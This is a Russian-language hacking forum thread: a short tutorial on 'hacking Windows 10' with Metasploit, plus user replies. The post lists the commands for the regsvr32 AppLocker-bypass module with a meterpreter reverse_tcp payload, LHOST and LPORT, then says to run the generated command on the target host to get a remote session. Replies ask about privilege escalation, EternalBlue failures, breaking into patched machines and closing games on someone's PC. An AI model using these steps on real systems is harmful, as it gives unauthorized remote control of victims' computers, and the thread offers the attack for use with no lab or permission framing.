Статья Hack Windows 10 (meterpreter)

Привет всем! В этой небольшой теме я хочу показать очередной способ взлома Windows, на этот раз это Windows 10. После обновления Metasploit в нем появился достаточно любопытный эксплоит (хотя, может он и раньше там был) - regsvr32_applocker_bypass_server

upload_2016-11-6_18-14-32.png


Итак, приступим, в терминале, вводим следующие команды:

> msfconsole (запускаем Metaslpoit)

> use exploit/windows/misc/regsvr32_applocker_bypass_server

upload_2016-11-6_17-58-28.png


> options (посмотрим доступные настройки эксплойта)

upload_2016-11-6_17-58-54.png


> set payload windows/meterpreter/reverse_tcp

> set LHOST 192.168.0.101 (Ваш локальный адрес)

> set LPORT 4444

> exploit

upload_2016-11-6_17-59-43.png


Если все прошло успешно видим следующее:

upload_2016-11-6_18-0-2.png


То, что я выделил цветом, это команда, которую необходимо ввести в командной строке целевого хоста, для получения сессии meterpreter.

upload_2016-11-6_18-0-23.png


После выполнения команды, в терминале Kali Linux откроется сессия:

upload_2016-11-6_18-0-45.png


> sessions –I 1 (Подключимся к ней)

> ps (Посмотрим список процессов на целевом хосте)

Тестировал я этот способ на реальном ПК с установленной на нем:

upload_2016-11-6_18-1-13.png


Спасибо за внимание.
 
Последнее редактирование:
  • Нравится
Реакции: lightgman, Tihon49, anonymous_prodject и ещё 14
Нажмите, чтобы раскрыть...
M

m0tion

Шелл от админа работает сразу или нужно делать privilege escalation?
 
O

OBLIVIONNN

Green Team
22.08.2017
144
92
BIT
1
Куда пропал эксплоит ? Есть альтернативный быстрый способ для получения meterpreter, без создание вредоносного файла.
 
M

MirTex_LAN

Member
18.07.2018
8
0
BIT
0
После выполнения команды в Powershell идёт бесконечная обработка запроса(Handling request from 192.*.*.*). В чем дело ?
 
M

Metasploit228

Member
09.08.2018
9
0
BIT
0
При вводе команды use exploit/windows/misc/regsvr32_applocker_bypass_server
Metasploit говорит что не может загрузить этот модуль. Что делать?
 
M

Metasploit228

Member
09.08.2018
9
0
BIT
0
Az1K сказал(а):
поменяли имя. найди с помощью поиска команда search regsvr32
Нажмите, чтобы раскрыть...
А вообще есть сейчас варик взлома десятки после последних патчей?

Ребят,а в чём вообще прикол? Пробовал юзать EthernalBlue на разных компах,разных версиях виндовс,всё равно сессию не получает? С чем могут быть связаны такие казусы? (Ломаю через Termux,всё прописываю правильно)
 
A

Az1K

One Level
22.08.2018
5
1
BIT
0
Metasploit228 сказал(а):
А вообще есть сейчас варик взлома десятки после последних патчей?
Нажмите, чтобы раскрыть...
Не знаю. Поищи в инете.

Metasploit228 сказал(а):
Ребят,а в чём вообще прикол? Пробовал юзать EthernalBlue на разных компах,разных версиях виндовс,всё равно сессию не получает? С чем могут быть связаны такие казусы? (Ломаю через Termux,всё прописываю правильно)
Нажмите, чтобы раскрыть...
Наверняка установлен патч на целевом компе.
 
Z

Zitoon PROPVP

Vander у меня есть вопрос можно ли с помощью метерпретер открыть консоль и закрывать окна (игры всякие) в винде,если да то можете пожалуйста обьяснить,(дать ссылку)как это сделать?
 
C

Chak Anonim

New member
04.01.2020
3
0
BIT
0
Я тебе конечно очень признателен как и все тут, но не суди строго.
Думаю всем нам будет лудьше если ты все эти команды будешь рассказывать(если кому не интересно, то можно делать в отдельной статье)
 
Для ответа нужно войти/зарегистрироваться
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!

Верх Низ